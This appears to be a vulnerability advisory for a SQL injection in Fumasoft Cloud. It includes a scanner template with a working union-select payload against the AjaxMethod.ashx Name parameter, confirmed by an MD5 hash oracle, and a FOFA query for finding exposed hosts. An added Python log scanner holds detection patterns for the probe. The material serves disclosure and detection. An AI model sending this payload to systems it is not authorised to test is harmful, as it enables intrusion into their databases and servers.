fumasoft-sqli: Fumasoft Cloud - SQL Injection

Date: 2025-08-01 | Affected software: Fumasoft Cloud | PoC: public

Vulnerability description

There is a SQL injection vulnerability in the AjaxMethod.ashx file of Fumasoft Cloud. Attackers can obtain server permissions through the vulnerability.

PoC code [public]

id: fumasoft-sqli

info:
  name: Fumasoft Cloud - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    There is a SQL injection vulnerability in the AjaxMethod.ashx file of Fumasoft Cloud. Attackers can obtain server permissions through the vulnerability
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-89
  metadata:
    max-request: 1
    verified: true
    fofa-query: title="Fumeng Cloud"
  tags: fumasoft,sqli,vuln

variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y'+union+select+substring(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','{{num}}')),3,32)--"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: status
        status:
          - 500
# digest: 4a0a0047304502210089ca10e7e8608a38997b910961aa9ba4c2a2b920c313bb532da5201db0600a4602200b449463c27277796959d1ffb361bac7b16c1a48a613e14e8dfc1452bed4a042:922c64590222798bb761d5b6d8e72950

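As an added defender-side example (not part of the original template or of Fumasoft's code), the following Python scans IIS-style request logs for the probe pattern above and reproduces the marker the template's matcher looks for; the log lines and their field layout are constructed.

```python
"""Detection for the AjaxMethod.ashx SQL injection probe described above.
Added example, not part of the original template; log lines are constructed."""
import hashlib
import re
from typing import Optional
from urllib.parse import parse_qs

VULN_STEM = "/ajax/ajaxmethod.ashx"          # handler named in the advisory
# Indicators taken from the published PoC payload.
SQLI_PATTERNS = {
    "quote_break": re.compile(r"'\s*(union|or|and)\b", re.I),
    "union_select": re.compile(r"\bunion\b.+\bselect\b", re.I),
    "mssql_hash_oracle": re.compile(r"\b(hashbytes|fn_sqlvarbasetostr)\b", re.I),
    "comment_tail": re.compile(r"--\s*$"),
}
# Constructed IIS/W3C-like layout: date time method uri-stem uri-query status.
LOG_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\d{3})$")

def oracle_marker(num: str) -> str:
    """The value the template's matcher expects in the body: md5(num) as 32
    lowercase hex chars. The payload's substring(..., 3, 32) strips the '0x'
    prefix that fn_sqlvarbasetostr adds, so the two strings agree."""
    return hashlib.md5(num.encode()).hexdigest()

def analyze_line(line: str) -> Optional[dict]:
    """Return a finding for a suspicious request to the handler, else None."""
    m = LOG_RE.match(line)
    if not m or m.group(3).lower() != VULN_STEM:
        return None
    ts, method, _stem, query, status = m.groups()
    params = parse_qs("" if query == "-" else query, keep_blank_values=True)
    hits = []
    for key, values in params.items():
        for value in values:                  # parse_qs has URL-decoded the value
            matched = [n for n, p in SQLI_PATTERNS.items() if p.search(value)]
            if matched:
                hits.append({"param": key, "value": value, "patterns": matched})
    if not hits:
        return None                           # e.g. a legitimate O'Brien lookup
    seen = {p for h in hits for p in h["patterns"]}
    return {"timestamp": ts, "method": method, "status": int(status),
            "indicators": hits, "likely_probe": "mssql_hash_oracle" in seen}

SAMPLE_LOGS = [  # constructed
    "2025-08-01 10:00:01 GET /Ajax/AjaxMethod.ashx action=getEmpByname&Name=Smith 200",
    "2025-08-01 10:00:02 GET /Ajax/AjaxMethod.ashx action=getEmpByname&Name=Y'+union+select+substring(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','999999999')),3,32)-- 500",
    "2025-08-01 10:00:03 GET /Ajax/AjaxMethod.ashx action=getEmpByname&Name=O%27Brien 200",
    "2025-08-01 10:00:04 GET /index.aspx - 200",
]

def scan(lines):
    """Run analyze_line over a log and keep only the findings."""
    return [f for f in map(analyze_line, lines) if f]
```

A 500 on this handler together with the hash-oracle functions in the query is the same signal the template uses to declare the host vulnerable, so such hits deserve a response-body review rather than a WAF tweak alone.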